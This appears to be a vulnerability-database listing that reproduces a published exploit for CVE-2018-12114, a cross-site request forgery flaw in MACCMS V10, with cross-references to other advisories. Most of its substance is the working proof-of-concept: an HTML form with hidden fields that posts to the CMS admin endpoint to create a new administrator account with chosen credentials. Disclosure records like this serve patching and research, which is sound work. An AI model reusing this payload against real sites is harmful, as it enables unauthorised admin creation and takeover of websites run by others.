MACCMS 10 Cross Site Request Forgery

🗓️ 13 Jun 2018 00:00:00Reported by bay0netType

packetstorm🔗 packetstormsecurity.com👁 36 Views

MACCMS V10 CSRF vulnerability allows arbitrary user additio

Reporter	Title	Published	Views	Family All 10
0day.today	MACCMS 10 - Cross-Site Request Forgery (Add User) Vulnerability	13 Jun 201800:00	–	zdt
CNVD	MACCMS 10 Cross-Site Request Forgery Vulnerability	15 Jun 201800:00	–	cnvd
CVE	CVE-2018-12114	14 Jun 201817:00	–	cve
Cvelist	CVE-2018-12114	14 Jun 201817:00	–	cvelist
Exploit DB	MACCMS 10 - Cross-Site Request Forgery (Add User)	13 Jun 201800:00	–	exploitdb
EUVD	EUVD-2018-4092	7 Oct 202500:30	–	euvd
exploitpack	MACCMS 10 - Cross-Site Request Forgery (Add User)	13 Jun 201800:00	–	exploitpack
NVD	CVE-2018-12114	14 Jun 201817:29	–	nvd
Prion	Cross site request forgery (csrf)	14 Jun 201817:29	–	prion
Prion	Cross site request forgery (csrf)	25 Jun 201820:29	–	prion

`# Exploit Title: MACCMS_V10 CSRF vulnerability add admin account  
# Date: 2018-06-11   
# Exploit Author: bay0net  
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9168309.html  
# Software Link: http://www.maccms.com/down.html  
# Version: V10  
# CVE : CVE-2018-12114  
  
  
I found a CSRF vulnerability in maccms_v10,this vulnerability can be arbitrarily added to users.  
  
  
The payload for attack is as follows.  
  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">  
<input type="hidden" name="admin_id" value="" />  
<input type="hidden" name="admin_name" value="test2" />  
<input type="hidden" name="admin_pwd" value="test2" />  
<input type="hidden" name="admin_status" value="1" />  
<input type="hidden" name="admin_auth[0]" value="index/welcome" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`

13 Jun 2018 00:00Current

0.8Low risk

Vulners AI Score0.8

EPSS0.00319